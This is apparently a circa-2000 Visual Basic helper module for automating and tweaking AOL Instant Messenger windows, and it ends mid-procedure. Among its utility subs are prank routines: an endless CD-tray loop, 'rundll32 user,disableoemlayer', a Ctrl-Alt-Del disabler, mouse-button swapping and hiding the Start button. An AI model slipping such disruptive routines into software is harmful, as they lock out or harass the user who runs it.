Attribute VB_Name = "SkarMod"
' '.·´\_ .·´\ /`·.' .·´\' (¯¯¯\
' ‹´ ‹\__( \ |/ .·´' '/ ‹\ \ | ‹\_/
'/¯¯¯\›`·. | |\ `·. | (¯) '\' / |\¯`·.
'\_(\___( /¸_| '\.·´' '\.·´ `·./ '`·./|___)
'
'
'
'
'
'SkarMod.bas
'
'
'By: §käR
'Web: www.8op.com/skar
'Email: iamskar@hotmail.com
'AIM: x skar
'
'Module Compatibility:
'Aim 3.0 & 4.0 (I havent tested any other version of aim)
'Windows 95-98 (I havent tested any other system with the module)
'
'
'Feel Free To Copy Some
'of the code. But be
'sure to give me props!
'
'
'ABOUT: This module is full of subs\functions
'that will help you learn VB(Visual Basic)
'and help you write a program of your own.
'It was made by Skar in Microsoft
'Visual Basic 5.0. In case you
'don't know, SkarMod stands for
'Skar's Module. If you have any trouble
'with it, you can contact me. My contact
'information is above.
'
'
'GREETINGS:
'Trance, Spark, Enfekt,
'ryn, supaflya, dunn, cheonggim, lemming,
'will aka exo, reflex, halo, 611, cik, sic, legion
'lohr, UnSaKreD, Top, lxb, friction, meridian
'mantis, wumpy, simic, toaster, hex, datagram
'trend, tension, ii, wegro(the thugged out white boy),
'dee, tuna, c0w, weed, illegal, latex, uG, djk, blackout,
'imperial, stealth, metal, radikal, kung, surge,
'stratus, oddisy, nikki, steph, jess, julia, flip,
'tmx, dope, jaguar, polar, oblivic, spider, rocky, iota,
'verty, psi, over-ride, callisto, froze, nod, rage,
'hades, shock, lit, fizik, flyman, quirk, zb, trik, syphon,
'kev, grip, pimper, reb, andymaul
'And All the people i forgot,
'which i know is probably like 9000000.
'
'
'W A R N I N G: please use with caution,
'do not test some of these procedures on yourself,
'because some may be very hazardous to your computer!
'
'
'*******************************************************************
'ok, heres my results on the scan of
'the module. i used ScanDatBas, by patorjk.
'when i scanned my module against some modules
'that had copied from each other, it came up
'making me look like i copied more. i fixed
'anything like that. also, some of the subs\functions
'i DID NOT COPY that came up as i copied, were removed.
'ScanDatBas finds any matching code, so if i had the same
'code has one of these modules, it would say it was copied
'i removed anything that said was copied, which was NOT copied.
'ItchyBallBatch.bas, dos32.bas, voltron.bas
'and digitalaim.bas 'were the ONLY
'modules i took code from
'anything else was not taken from any
'other module. if you think i took some
'of your code, you are most likely wrong.
'ScanDatBas is pretty much bull shit, i just
'put this up because i know people want to see it.
' ********** Start Report For SkarMod.bas **********
' Total number of subs/functions: 226
'
' Subs/functions Copied From ItchyBallBatchToo.0.bas: 5/269
' Subs/functions Copied From dos32.bas: 2/145
' Subs/functions Copied From Digital AIM.bas: 7/187
' Subs/functions Copied From voltron.bas: 4/93
' Total number of subs/functions copied: 21/226
'
' Percent of ItchyBallBatchToo.0.bas copied: 1.8%
' Percent of dos32.bas copied: 1.3%
' Percent of Digital AIM.bas copied: 3.7%
' Percent of voltron.bas copied: 5.3%
' Total percent copied: 9.2%
'
' List of copied subs/functions:
' ScreenFuck = Computer_ScreenFuck (a sub taken from: ItchyBallBatchToo.0.bas)
' Infinite_MSGBOX = Forever_MessageBox (a sub taken from: ItchyBallBatchToo.0.bas)
' File_Delete = Computer_Delete_File (a sub taken from: ItchyBallBatchToo.0.bas)
' Aim_Chat_Invite_Normal = Aim_Chat_Invite_Normal (a sub taken from: ItchyBallBatchToo.0.bas)
' Aim_Im_Get_Text = Aim_Im_Get_Text (a sub taken from: ItchyBallBatchToo.0.bas)
' AIM_GroupsTo_Combo = AIM_GroupsTo_Combo (a sub taken from: Digital AIM.bas)
' AIM_GroupsTo_List = AIM_GroupsTo_List (a sub taken from: Digital AIM.bas)
' Aim_Chat_IgnoreUser = Chat_IgnoreUser (a sub taken from: Digital AIM.bas)
' Aim_Chat_ToCombo = Chat_AddRoom_Combo (a sub taken from: Digital AIM.bas)
' Aim_Chat_ToList = Chat_AddRoom_Combo (a sub taken from: Digital AIM.bas)
' Aim_Im_Get_Sn = IM_GetSn (a sub taken from: Digital AIM.bas)
' Aim_Chat_Get_Language = Chat_MaxMess (a sub taken from: Digital AIM.bas)
' Delete_DIR = Directory_Delete (a sub taken from: voltron.bas)
' File_Name = File_GetFileName (a sub taken from: voltron.bas)
' File_ReName = File_ReName (a sub taken from: voltron.bas)
' printerfuck = printerfuck (a sub taken from: voltron.bas)
' ReplaceString = ReplaceString (a sub taken from: dos32.bas)
' Get_Caption = Get_Caption (a sub taken from: dos32.bas)
'
' Report created by Scan That Bas 1.0 by PAT or JK
' ********** End Report **********
'
'
'
'
'Ahhh, know to the Real Deal! ;]
'
'
Option Explicit
'Declarations
Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Declare Function SendMessageLong& Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long)
Declare Function SendMessageByString Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As String) As Long
Declare Function EnableWindow Lib "user32" (ByVal hwnd As Long, ByVal fEnable As Long) As Long
Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (destination As Any, Source As Any, ByVal Length As Long)
Declare Sub RtlMoveMemory Lib "kernel32" (ByRef dest As Any, ByRef Source As Any, ByVal nBytes As Long)
Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Declare Function GetPrivateProfileString Lib "kernel32" Alias "GetPrivateProfileStringA" (ByVal lpApplicationName As String, ByVal lpKeyName As Any, ByVal lpDefault As String, ByVal lpReturnedString As String, ByVal nSize As Long, ByVal lpFileName As String) As Long
Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByRef lpNumberOfBytesWritten As Long) As Long
Declare Function WritePrivateProfileString Lib "kernel32" Alias "WritePrivateProfileStringA" (ByVal lpApplicationName As String, ByVal lpKeyName As Any, ByVal lpString As Any, ByVal lpFileName As String) As Long
Declare Function AppendMenu Lib "user32" Alias "AppendMenuA" (ByVal hMenu As Long, ByVal wFlags As Long, ByVal wIDNewItem As Long, ByVal lpNewItem As String) As Long
Declare Function CreatePopupMenu Lib "user32" () As Long
Declare Function DrawMenuBar Lib "user32" (ByVal hwnd As Long) As Long
Declare Function DeleteMenu Lib "user32" (ByVal hMenu As Long, ByVal nPosition As Long, ByVal wFlags As Long) As Long
Declare Function DestroyMenu Lib "user32" (ByVal hMenu%) As Integer
Declare Function EnumWindows& Lib "user32" (ByVal lpEnumFunc As Long, ByVal lParam As Long)
Declare Function ExitWindowsEx& Lib "user32" (ByVal uFlags As Long, ByVal DWreserved As Long)
Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Declare Function GetClassName& Lib "user32" Alias "GetClassNameA" (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long)
Declare Function GetMenu Lib "user32" (ByVal hwnd As Long) As Long
Declare Function GetMenuItemCount Lib "user32" (ByVal hMenu As Long) As Long
Declare Function GetMenuItemID Lib "user32" (ByVal hMenu As Long, ByVal nPos As Long) As Long
Declare Function GetMenuString Lib "user32" Alias "GetMenuStringA" (ByVal hMenu As Long, ByVal wIDItem As Long, ByVal lpString As String, ByVal nMaxCount As Long, ByVal wFlag As Long) As Long
Declare Function GetParent Lib "user32" (ByVal hwnd As Long) As Long
Declare Function GetSubMenu Lib "user32" (ByVal hMenu As Long, ByVal nPos As Long) As Long
Declare Function GetTopWindow Lib "user32" (ByVal hwnd As Long) As Long
Declare Function GetWindow Lib "user32" (ByVal hwnd As Long, ByVal wCmd As Long) As Long
Declare Function GetWindowLong& Lib "user32" Alias "GetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long)
Declare Function GetWindowRect Lib "user32" (ByVal hwnd As Long, lpRect As RECT) As Long
Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Declare Function GetWindowTextLength Lib "user32" Alias "GetWindowTextLengthA" (ByVal hwnd As Long) As Long
Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
Declare Function InsertMenu Lib "user32" Alias "InsertMenuA" (ByVal hMenu As Long, ByVal nPosition As Long, ByVal wFlags As Long, ByVal wIDNewItem As Long, ByVal lpNewItem As String) As Long
Declare Function iswindowenabled Lib "user32" Alias "IsWindowEnabled" (ByVal hwnd As Long) As Long
Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Declare Function MoveWindow Lib "user32" (ByVal hwnd As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal bRepaint As Long) As Long
Declare Function PutFocus Lib "user32" Alias "SetFocus" (ByVal hwnd As Long) As Long
Declare Function RedrawWindow Lib "user32" (ByVal hwnd As Long, lprcUpdate As RECT, ByVal hrgnUpdate As Long, ByVal fuRedraw As Long) As Long
Declare Function RegisterWindowMessage& Lib "user32" Alias "RegisterWindowMessageA" (ByVal lpString As String)
Declare Function ReleaseCapture Lib "user32" () As Long
Declare Function RemoveMenu Lib "user32" (ByVal hMenu As Long, ByVal nPosition As Long, ByVal wFlags As Long) As Long
Declare Function sendmessagebynum& Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long)
Declare Function SetFocusAPI Lib "user32" Alias "SetFocus" (ByVal hwnd As Long) As Long
Declare Function SetRect Lib "user32" (lpRect As RECT, ByVal X1 As Long, ByVal Y1 As Long, ByVal X2 As Long, ByVal Y2 As Long) As Long
Declare Function SetParent Lib "user32" (ByVal hWndChild As Long, ByVal hWndNewParent As Long) As Long
Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal X As Long, ByVal Y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
Declare Function ShowCursor Lib "user32" (ByVal bShow As Long) As Long
Declare Function sndPlaySound Lib "winmm.dll" Alias "sndPlaySoundA" (ByVal lpszSoundName As String, ByVal uFlags As Long) As Long
Declare Function SystemParametersInfo Lib "user32" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, lpvParam As Any, ByVal fuWinIni As Long) As Long
'Constants
Const EM_UNDO = &HC7
Global Const GFSR_SYSTEMRESOURCES = 0
Global Const GFSR_GDIRESOURCES = 1
Global Const GFSR_USERRESOURCES = 2
Global Const WM_MDICREATE = &H220
Global Const WM_MDIDESTROY = &H221
Global Const WM_MDIACTIVATE = &H222
Global Const WM_MDIRESTORE = &H223
Global Const WM_MDINEXT = &H224
Global Const WM_MDIMAXIMIZE = &H225
Global Const WM_MDITILE = &H226
Global Const WM_MDICASCADE = &H227
Global Const WM_MDIICONARRANGE = &H228
Global Const WM_MDIGETACTIVE = &H229
Global Const WM_MDISETMENU = &H230
Global Const WM_CUT = &H300
Global Const WM_COPY = &H301
Global Const WM_PASTE = &H302
Global Const SND_SYNC = &H0
Global Const SND_ASYNC = &H1
Global Const SND_NODEFAULT = &H2
Global Const SND_LOOP = &H8
Global Const SND_NOSTOP = &H10
Public Const WM_CHAR = &H102
Public Const WM_SETTEXT = &HC
Public Const WM_USER = &H400
Public Const WM_KEYDOWN = &H100
Public Const WM_KEYUP = &H101
Public Const WM_LBUTTONDOWN = &H201
Public Const WM_LBUTTONUP = &H202
Public Const WM_CLOSE = &H10
Public Const WM_COMMAND = &H111
Public Const WM_CLEAR = &H303
Public Const WM_DESTROY = &H2
Public Const WM_GETTEXT = &HD
Public Const WM_GETTEXTLENGTH = &HE
Public Const WM_LBUTTONDBLCLK = &H203
Public Const BM_GETCHECK = &HF0
Public Const BM_GETSTATE = &HF2
Public Const BM_SETCHECK = &HF1
Public Const BM_SETSTATE = &HF3
Public Const EWX_FORCE = 4
Public Const EWX_LOGOFF = 0
Public Const EWX_REBOOT = 2
Public Const EWX_SHUTDOWN = 1
Public Const LB_GETITEMDATA = &H199
Public Const LB_GETCOUNT = &H18B
Public Const LB_ADDSTRING = &H180
Public Const LB_DELETESTRING = &H182
Public Const LB_FINDSTRING = &H18F
Public Const LB_FINDSTRINGEXACT = &H1A2
Public Const LB_GETCURSEL = &H188
Public Const LB_GETTEXT = &H189
Public Const LB_GETTEXTLEN = &H18A
Public Const LB_SELECTSTRING = &H18C
Public Const LB_SETCOUNT = &H1A7
Public Const LB_SETCURSEL = &H186
Public Const LB_SETSEL = &H185
Public Const LB_INSERTSTRING = &H181
Public Const VK_HOME = &H24
Public Const VK_RIGHT = &H27
Public Const VK_CONTROL = &H11
Public Const VK_DELETE = &H2E
Public Const VK_DOWN = &H28
Public Const VK_LEFT = &H25
Public Const VK_RETURN = &HD
Public Const VK_SPACE = &H20
Public Const VK_TAB = &H9
Public Const HWND_TOP = 0
Public Const HWND_TOPMOST = -1
Public Const HWND_NOTOPMOST = -2
Public Const SWP_NOMOVE = &H2
Public Const SWP_NOSIZE = &H1
Public Const flags = SWP_NOMOVE Or SWP_NOSIZE
Public Const GW_CHILD = 5
Public Const GW_HWNDFIRST = 0
Public Const GW_HWNDLAST = 1
Public Const GW_HWNDNEXT = 2
Public Const GW_HWNDPREV = 3
Public Const GW_MAX = 5
Public Const GW_OWNER = 4
Public Const SW_MAXIMIZE = 3
Public Const SW_MINIMIZE = 6
Public Const SW_HIDE = 0
Public Const SW_RESTORE = 9
Public Const SW_SHOW = 5
Public Const SW_SHOWDEFAULT = 10
Public Const SW_SHOWMAXIMIZED = 3
Public Const SW_ShowMinimized = 2
Public Const SW_SHOWMINNOACTIVE = 7
Public Const SW_SHOWNOACTIVATE = 4
Public Const SW_SHOWNORMAL = 1
Public Const MF_APPEND = &H100&
Public Const MF_DELETE = &H200&
Public Const MF_CHANGE = &H80&
Public Const MF_ENABLED = &H0&
Public Const MF_DISABLED = &H2&
Public Const MF_REMOVE = &H1000&
Public Const MF_POPUP = &H10&
Public Const MF_STRING = &H0&
Public Const MF_UNCHECKED = &H0&
Public Const MF_CHECKED = &H8&
Public Const MF_GRAYED = &H1&
Public Const MF_BYPOSITION = &H400&
Public Const MF_BYCOMMAND = &H0&
Public Const MF_SEPARATOR = &H800&
Public Const GWW_HINSTANCE = (-6)
Public Const GWW_ID = (-12)
Public Const GWL_STYLE = (-16)
Public Const ENTA = 13
Public Const PROCESS_VM_READ = &H10
Public Const STANDARD_RIGHTS_REQUIRED = &HF0000
Private Const EM_LINESCROLL = &HB6
Private Const SPI_SCREENSAVERRUNNING = 97
'Types
Type RECT
Left As Long
Top As Long
Right As Long
Bottom As Long
End Type
Type POINTAPI
X As Long
Y As Long
End Type
Sub AboutTheAuthor()
'Skar, real name Ben Palmer,
'is a bright, sexy young chap.
'If your looking for a handsome male
'turn to Skar. As a child, skar used to
'pimp da todlerz. He grew up in a ghetto
'hood, sellin crack to the thugs and
'bustin caps in random asses. He got into
'drugs at the age of 7. At age 8, he was
'an alchoholic. He went to a drugs\alchohol
'program at age 9 and took the 12 step program
'to be rid of his problems. He changed his life
'around and became a male prostitute (jiggalo).
'He started getting a new STD every week, and
'had over 100 health pills to take each day.
'Now, he's here today, still a sexy bitch.
'THE END
'
'note: the story isn't true (well, some of it is)
';]
End Sub
Sub CdRom_Close()
'This closes the CD-ROM.
Dim cdromclose
cdromclose = mciSendString("set CDAudio door closed", vbNullString, 0, 0)
End Sub
Sub CdRom_Open()
'This opens the CD-ROM.
Dim cdromopen
cdromopen = mciSendString("set CDAudio door open", vbNullString, 0, 0)
End Sub
Sub CdRom_Crazy()
'this makes the cdrom go crazy
Do
Call CdRom_Open
Call CdRom_Close
Loop
End Sub
Sub Cursor_Hide()
'This hides the Mouse Cursor.
Dim hidecursor
hidecursor = ShowCursor(False)
End Sub
Sub Cursor_Show()
'This shows the Mouse Cursor.
Dim ShowCursor
ShowCursor = ShowCursor(True)
End Sub
Sub Mouse_SwapButtons()
'taken from itchyballbatch.bas
'Swaps the mouse buttons using rundll32
Shell ("rundll32 user,swapmousebutton")
End Sub
Sub Cursor_Default(Frm As Form)
Frm.MousePointer = 0
End Sub
Sub Cursor_Cross(Frm As Form)
Frm.MousePointer = 2
End Sub
Sub Cursor_Ibeam(Frm As Form)
Frm.MousePointer = 3
End Sub
Sub Cursor_Icon(Frm As Form)
Frm.MousePointer = 4
End Sub
Sub Cursor_Size(Frm As Form)
Frm.MousePointer = 5
End Sub
Sub Cursor_SizeNESW(Frm As Form)
Frm.MousePointer = 6
End Sub
Sub Cursor_SizeNS(Frm As Form)
Frm.MousePointer = 7
End Sub
Sub Cursor_SizeNWSE(Frm As Form)
Frm.MousePointer = 8
End Sub
Sub Cursor_SizeWE(Frm As Form)
Frm.MousePointer = 9
End Sub
Sub Cursor_UpArrow(Frm As Form)
Frm.MousePointer = 10
End Sub
Sub Cursor_HourGlass(Frm As Form)
Frm.MousePointer = 11
End Sub
Sub Cursor_NoDrop(Frm As Form)
Frm.MousePointer = 12
End Sub
Sub Cursor_ArrowandHourGlass(Frm As Form)
Frm.MousePointer = 13
End Sub
Sub Cursor_ArrowandQuestion(Frm As Form)
Frm.MousePointer = 14
End Sub
Sub Cursor_SizeAll(Frm As Form)
Frm.MousePointer = 15
End Sub
Sub Cursor_Custom(Frm As Form)
Frm.MousePointer = 99
End Sub
Sub Hide_StartMenu()
Dim ShellTrayWnd As Long, Button As Long
ShellTrayWnd& = FindWindow("Shell_TrayWnd", vbNullString)
Button& = FindWindowEx(ShellTrayWnd&, 0&, "Button", vbNullString)
ShowWindow Button&, 0
End Sub
Sub Show_StartMenu()
Dim ShellTrayWnd As Long, Button As Long
ShellTrayWnd& = FindWindow("Shell_TrayWnd", vbNullString)
Button& = FindWindowEx(ShellTrayWnd&, 0&, "Button", vbNullString)
ShowWindow Button&, 1
End Sub
Sub Shell_ControlPanel()
'Opens the Control Panel.
Shell "rundll32 shell32,Control_RunDLL", vbNormalFocus
End Sub
Sub ScreenFuck()
'taken from itchyballbatch2.bas
'This Fucks your screen up.
Shell "rundll32 user,disableoemlayer"
End Sub
Sub Disable_CTRLALTDEL()
Dim ret As Integer
Dim pOld As Boolean
ret = SystemParametersInfo(SPI_SCREENSAVERRUNNING, True, pOld, 0)
End Sub
Sub Enable_CTRLALTDEL()
'This enables the alt key.
'which makes CTRLALTDEL able.
Dim ret As Integer
Dim pOld As Boolean
ret = SystemParametersInfo(SPI_SCREENSAVERRUNNING, False, pOld, 0)
End Sub
Sub Aim_BudList_Hide_Ad1()
'this hides ad1 on your bud list
Dim oscarbuddylistwin As Long, WndAte32Class As Long, ate32class As Long
oscarbuddylistwin& = FindWindow("_Oscar_BuddyListWin", vbNullString)
WndAte32Class& = FindWindowEx(oscarbuddylistwin&, 0&, "WndAte32Class", vbNullString)
ate32class& = FindWindowEx(WndAte32Class&, 0&, "Ate32Class", vbNullString)
ShowWindow ate32class&, 0
End Sub
Sub Aim_BudList_Hide()
'this hides your buddy list
Dim oscarbuddylistwin As Long
oscarbuddylistwin& = FindWindow("_Oscar_BuddyListWin", vbNullString)
ShowWindow oscarbuddylistwin&, 0
End Sub
Sub Aim_BudList_Hide_IMButton()
'this hides the IM button on your bud list
Dim oscarbuddylistwin As Long, oscartabgroup As Long, oscariconbtn As Long
oscarbuddylistwin& = FindWindow("_Oscar_BuddyListWin", vbNullString)
oscartabgroup& = FindWindowEx(oscarbuddylistwin&, 0&, "_Oscar_TabGroup", vbNullString)
oscariconbtn& = FindWindowEx(oscartabgroup&, 0&, "_Oscar_IconBtn", vbNullString)
ShowWindow oscariconbtn&, 0
End Sub
Sub AIM_BudList_Show_IMButton()
'shows the im button on your buddy list
Dim oscarbuddylistwin As Long, oscartabgroup As Long, oscariconbtn As Long
oscarbuddylistwin& = FindWindow("_Oscar_BuddyListWin", vbNullString)
oscartabgroup& = FindWindowEx(oscarbuddylistwin&, 0&, "_Oscar_TabGroup", vbNullString)
oscariconbtn& = FindWindowEx(oscartabgroup&, 0&, "_Oscar_IconBtn", vbNullString)
ShowWindow oscariconbtn&, 1
End Sub
Sub Aim_BudList_Hide_ChatButton()
'this hides the chat button on your bud list
Dim oscarbuddylistwin As Long, oscartabgroup As Long, oscariconbtn As Long
oscarbuddylistwin& = FindWindow("_Oscar_BuddyListWin", vbNullString)
oscartabgroup& = FindWindowEx(oscarbuddylistwin&, 0&, "_Oscar_TabGroup", vbNullString)
oscariconbtn& = FindWindowEx(oscartabgroup&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(oscartabgroup&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
ShowWindow oscariconbtn&, 0
End Sub
Sub Aim_BudList_Show_ChatButton()
'shows the chatbutton on your buddy list
Dim oscarbuddylistwin As Long, oscartabgroup As Long, oscariconbtn As Long
oscarbuddylistwin& = FindWindow("_Oscar_BuddyListWin", vbNullString)
oscartabgroup& = FindWindowEx(oscarbuddylistwin&, 0&, "_Oscar_TabGroup", vbNullString)
oscariconbtn& = FindWindowEx(oscartabgroup&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(oscartabgroup&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
ShowWindow oscariconbtn&, 1
End Sub
Sub Aim_BudList_Hide_TalkButton()
'this hides the talk button on your bud list
Dim oscarbuddylistwin As Long, oscartabgroup As Long, oscariconbtn As Long
oscarbuddylistwin& = FindWindow("_Oscar_BuddyListWin", vbNullString)
oscartabgroup& = FindWindowEx(oscarbuddylistwin&, 0&, "_Oscar_TabGroup", vbNullString)
oscariconbtn& = FindWindowEx(oscartabgroup&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(oscartabgroup&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(oscartabgroup&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
ShowWindow oscariconbtn&, 0
End Sub
Sub Aim_BudList_Show_TalkButton()
'shows the talk button on your buddy list
Dim oscarbuddylistwin As Long, oscartabgroup As Long, oscariconbtn As Long
oscarbuddylistwin& = FindWindow("_Oscar_BuddyListWin", vbNullString)
oscartabgroup& = FindWindowEx(oscarbuddylistwin&, 0&, "_Oscar_TabGroup", vbNullString)
oscariconbtn& = FindWindowEx(oscartabgroup&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(oscartabgroup&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(oscartabgroup&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
ShowWindow oscariconbtn&, 1
End Sub
Sub Aim_BudList_Hide_Ad2()
'this hides the 2nd ad on your bud list
Dim oscarbuddylistwin As Long, WndAte32Class As Long, ate32class As Long
oscarbuddylistwin& = FindWindow("_Oscar_BuddyListWin", vbNullString)
WndAte32Class& = FindWindowEx(oscarbuddylistwin&, WndAte32Class&, "WndAte32Class", vbNullString)
WndAte32Class& = FindWindowEx(oscarbuddylistwin&, WndAte32Class&, "WndAte32Class", vbNullString)
ate32class& = FindWindowEx(WndAte32Class&, 0&, "Ate32Class", vbNullString)
ShowWindow ate32class&, 0
End Sub
Sub Aim_BudList_Hide_SearchTxT()
'this hides the search textbox
Dim oscarbuddylistwin As Long, Edit As Long
oscarbuddylistwin& = FindWindow("_Oscar_BuddyListWin", vbNullString)
Edit& = FindWindowEx(oscarbuddylistwin&, 0&, "Edit", vbNullString)
ShowWindow Edit&, 0
End Sub
Sub Aim_BudList_Hide_Ads()
'this hides all the ads on your bud list
Dim oscarbuddylistwin As Long, WndAte32Class As Long, ate32class As Long
oscarbuddylistwin& = FindWindow("_Oscar_BuddyListWin", vbNullString)
WndAte32Class& = FindWindowEx(oscarbuddylistwin&, 0&, "WndAte32Class", vbNullString)
ate32class& = FindWindowEx(WndAte32Class&, 0&, "Ate32Class", vbNullString)
ShowWindow ate32class&, 0
oscarbuddylistwin& = FindWindow("_Oscar_BuddyListWin", vbNullString)
WndAte32Class& = FindWindowEx(oscarbuddylistwin&, WndAte32Class&, "WndAte32Class", vbNullString)
ate32class& = FindWindowEx(WndAte32Class&, 0&, "Ate32Class", vbNullString)
ShowWindow ate32class&, 0
End Sub
Sub Aim_AwayMessage()
'runs the default away message
Dim oscarbuddylistwin&
oscarbuddylistwin& = FindWindow("_oscar_buddylistwin", vbNullString)
Call RunMenuByString(oscarbuddylistwin&, "New Message...")
End Sub
Sub Aim_EditProfile()
'opens the edit profile window
Dim oscarbuddylistwin&
oscarbuddylistwin& = FindWindow("_oscar_buddylistwin", vbNullString)
Call RunMenuByString(oscarbuddylistwin&, "Edit &Profile...")
End Sub
Sub Aim_Preferences()
'shows the aim preferences window
Dim oscarbuddylistwin&
oscarbuddylistwin& = FindWindow("_oscar_buddylistwin", vbNullString)
Call RunMenuByString(oscarbuddylistwin&, "Edit &Preferences...")
End Sub
Sub Aim_ChangePW()
'pops up the change pw screen
Dim oscarbuddylistwin&
oscarbuddylistwin& = FindWindow("_oscar_buddylistwin", vbNullString)
Call RunMenuByString(oscarbuddylistwin&, "&Change Password...")
End Sub
Sub Aim_UpdateEmail()
'opens the update email window
Dim oscarbuddylistwin&
oscarbuddylistwin& = FindWindow("_oscar_buddylistwin", vbNullString)
Call RunMenuByString(oscarbuddylistwin&, "&Update E-mail Address...")
End Sub
Sub Aim_ConfirmAccount()
'executes the aim account comfirmer
Dim oscarbuddylistwin&
oscarbuddylistwin& = FindWindow("_oscar_buddylistwin", vbNullString)
Call RunMenuByString(oscarbuddylistwin&, "Confirm &Account...")
End Sub
Sub Aim_BudList_OnOffTop()
'makes your buddylist go on or off top
'if you have it set on ON, then it will turn it OFF
'if its set on OFF, then it will turn ON
Dim oscarbuddylistwin&
oscarbuddylistwin& = FindWindow("_oscar_buddylistwin", vbNullString)
Call RunMenuByString(oscarbuddylistwin&, "&Keep Buddy List On Top")
End Sub
Sub Aim_BudList_Load()
'loads a buddy list
Dim oscarbuddylistwin&
oscarbuddylistwin& = FindWindow("_oscar_buddylistwin", vbNullString)
Call RunMenuByString(oscarbuddylistwin&, "&Load Buddy List...")
End Sub
Sub Aim_BudList_Save()
'saves bud list
Dim oscarbuddylistwin&
oscarbuddylistwin& = FindWindow("_oscar_buddylistwin", vbNullString)
Call RunMenuByString(oscarbuddylistwin&, "&Save Buddy List...")
End Sub
Sub Aim_FormatSN()
'opens the format screenname window
Dim oscarbuddylistwin&
oscarbuddylistwin& = FindWindow("_oscar_buddylistwin", vbNullString)
Call RunMenuByString(oscarbuddylistwin&, "&Format Screen Name...")
End Sub
Sub Aim_BudList_Show_Ads()
'this shows all the ads on your bud list
Dim oscarbuddylistwin As Long, WndAte32Class As Long, ate32class As Long
oscarbuddylistwin& = FindWindow("_Oscar_BuddyListWin", vbNullString)
WndAte32Class& = FindWindowEx(oscarbuddylistwin&, 0&, "WndAte32Class", vbNullString)
ate32class& = FindWindowEx(WndAte32Class&, 0&, "Ate32Class", vbNullString)
ShowWindow ate32class&, 1
oscarbuddylistwin& = FindWindow("_Oscar_BuddyListWin", vbNullString)
WndAte32Class& = FindWindowEx(oscarbuddylistwin&, WndAte32Class&, "WndAte32Class", vbNullString)
ate32class& = FindWindowEx(WndAte32Class&, 0&, "Ate32Class", vbNullString)
ShowWindow ate32class&, 1
End Sub
Sub Aim_BudList_Show_SearchTxT()
'this shows the search textbox
Dim oscarbuddylistwin As Long, Edit As Long
oscarbuddylistwin& = FindWindow("_Oscar_BuddyListWin", vbNullString)
Edit& = FindWindowEx(oscarbuddylistwin&, 0&, "Edit", vbNullString)
ShowWindow Edit&, 1
End Sub
Sub Aim_BudList_Hide_SearchGo()
'this hides the "go" search button
Dim oscarbuddylistwin As Long, oscariconbtn As Long
oscarbuddylistwin& = FindWindow("_Oscar_BuddyListWin", vbNullString)
oscariconbtn& = FindWindowEx(oscarbuddylistwin&, 0&, "_Oscar_IconBtn", vbNullString)
ShowWindow oscariconbtn&, 0
End Sub
Sub Aim_BudList_Show_SearchGo()
'this shows the "go" search button
Dim oscarbuddylistwin As Long, oscariconbtn As Long
oscarbuddylistwin& = FindWindow("_Oscar_BuddyListWin", vbNullString)
oscariconbtn& = FindWindowEx(oscarbuddylistwin&, 0&, "_Oscar_IconBtn", vbNullString)
ShowWindow oscariconbtn&, 1
End Sub
Sub Aim_Chat_Hide_Ad1()
'hides chat ad #1
Dim aimchatwnd As Long, WndAte32Class As Long, ate32class As Long
aimchatwnd& = FindWindow("AIM_ChatWnd", vbNullString)
WndAte32Class& = FindWindowEx(aimchatwnd&, WndAte32Class&, "WndAte32Class", vbNullString)
